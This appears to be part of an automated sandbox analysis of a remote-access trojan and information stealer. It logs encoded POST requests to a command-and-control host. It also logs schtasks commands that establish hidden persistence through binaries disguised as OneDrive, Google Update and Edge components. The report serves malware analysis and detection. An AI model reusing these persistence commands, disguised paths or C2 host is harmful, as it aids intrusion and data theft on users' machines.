                                                        Oct 30, 2024 05:24:09.419033051 CET | 1076 | OUT | Data Raw: 57 5f 59 57 55 55 53 51 58 57 50 59 55 5e 5b 5e 54 59 5c 5a 59 51 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_YWUUSQXWPYU^[^TY\ZYQZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%];2\(;2Y3+.%#1.3/98X#:':3<&:$(): F$,Z*=
                                                        Oct 30, 2024 05:24:09.678165913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:09.933211088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:09.933257103 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4bjSAD0Fgm1y%2F0NkfIGRM2w5Tb76qKitP4Mo2n%2BA8rR1TqLBnVPm93vClONXL1lqkgHpoDDrPrLbn103u7xrc1PwAGt%2FQos1c6xTaQKvLmRXfagqUpRouBEYW8mzeeSe%2FnkWYbAqphQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2542f502cd4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1433&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1038737&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        145 | 192.168.2.4 | 50148 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:09.988802910 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        146 | 192.168.2.4 | 50149 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:10.062053919 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:10.418000937 CET | 1076 | OUT | Data Raw: 57 57 5c 55 50 58 56 52 58 57 50 59 55 5e 5b 5d 54 5e 5c 58 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\UPXVRXWPYU^[]T^\XYVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8"_+%'- 90\2?8'4:?1_+](%]':-: F$,Z*=
                                                        Oct 30, 2024 05:24:10.656299114 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:10.880969048 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZOcW7kvNl%2FzNXcK9WyrOylcdcmMmRANjivZz3rQewqbmkNx02s%2BP1xoZL6yVGJBaO6aFxhE9VS2GTmBfO6LQyz5piWa3rqQ%2BwmMYqJgV8huD1jOTyMK453JavxBpSJ7O%2BB8IHQmeBA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a25a3ab783a4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1330882&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        147 | 192.168.2.4 | 50150 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:11.017092943 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:24:11.372715950 CET | 1076 | OUT | Data Raw: 57 5e 5c 5d 50 5f 53 52 58 57 50 59 55 59 5b 5a 54 5c 5c 55 59 5d 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\]P_SRXWPYUY[ZT\\UY]Z]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,>()0>7.& _%</:[ 4&*+()\$./: F$,Z*!
                                                        Oct 30, 2024 05:24:11.606013060 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:11.904074907 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tY0yuv9gNNLE19GW3BeQcYEs%2FWEUL5SyvLAb5WWvNdx2Id%2F2JRPsGXNYpgL0yaCTJbbTrRdZqTfcsJMrrEDLmDZ1OMGq2TQZew3RcLAHeDoMrAkep%2BYk0y2Qz7zdwxU%2BM8G94tM4QtU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2603abc2e18-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1251512&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        148 | 192.168.2.4 | 50151 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:12.032974958 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:12.386756897 CET | 1076 | OUT | Data Raw: 57 50 59 51 50 5f 56 51 58 57 50 59 55 5b 5b 52 54 5f 5c 5c 59 5c 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYQP_VQXWPYU[[RT_\\Y\Z]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_/3!(8&3=.3$. 87"*/Z2Y<&*38.: F$,Z*)
                                                        Oct 30, 2024 05:24:12.640022993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:12.875405073 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zxFx%2FD0bmmi4Ig7Uh1rff%2FLJ%2BQeIe8cGHipi3gQC5LCjjwwrtAAGFKlcJ%2BTJ4rIaI2Q%2Bmmw9ukKdaqhMt0powilz2klVuqmumvxcSpxiFEkf6D0Lrrrcz2yn9JryDI922rejee37bCo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a266aefa4746-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1042&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1310407&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        149 | 192.168.2.4 | 50152 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:13.008143902 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:13.442291021 CET | 1076 | OUT | Data Raw: 52 57 5c 50 55 54 53 55 58 57 50 59 55 5c 5b 5e 54 59 5c 54 59 52 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RW\PUTSUXWPYU\[^TY\TYRZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/*\<(Z07A9%.;;\;4%\+908/: F$,Z*5
                                                        Oct 30, 2024 05:24:13.614451885 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:13.880127907 CET | 800 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITBZhYZbZGF8RGuw4fbiPak%2F%2FNhT%2FTE4zuewueG%2B62ZvRpcaAigkyMtzQ6c%2B35m13fd65RrNCm%2BlISnTL%2FGZgQmfBCLzvOyASPNMIE%2BvFVU4CeRqMr%2B5T9ZZyh70eMh%2F80Fkmv0OGBE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a26cb8dc3ab0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1371212&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:24:13.880150080 CET | 800 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ITBZhYZbZGF8RGuw4fbiPak%2F%2FNhT%2FTE4zuewueG%2B62ZvRpcaAigkyMtzQ6c%2B35m13fd65RrNCm%2BlISnTL%2FGZgQmfBCLzvOyASPNMIE%2BvFVU4CeRqMr%2B5T9ZZyh70eMh%2F80Fkmv0OGBE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a26cb8dc3ab0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1371212&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Target ID:0
                                                        Start time:00:21:57
                                                        Start date:30/10/2024
                                                        Path:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                                                        Imagebase:0xfa0000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
                                                        Imagebase:0x240000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 66%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:7
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
                                                        Imagebase:0xf30000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 66%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x800000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 9 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZ" /sc ONLOGON /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "DViaOgnvmAhwCXZD" /sc MINUTE /mo 12 /tr "'C:\Recovery\DViaOgnvmAhwCXZ.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft\Edge\smartscreen.exe'" /rl HIGHEST /f
                                                        Imagebase:0x7ff76f990000
                                                        File size:235'008 bytes
                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:00:22:00
                                                        Start date:30/10/2024
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks.exe /create /tn "0JLWNg4Sz10" /sc MINUTE /mo 10 /tr "'C:\Users\user\Desktop\0JLWNg4Sz1.exe'" /f
                                                        Imagebase:0x7ff76f990000
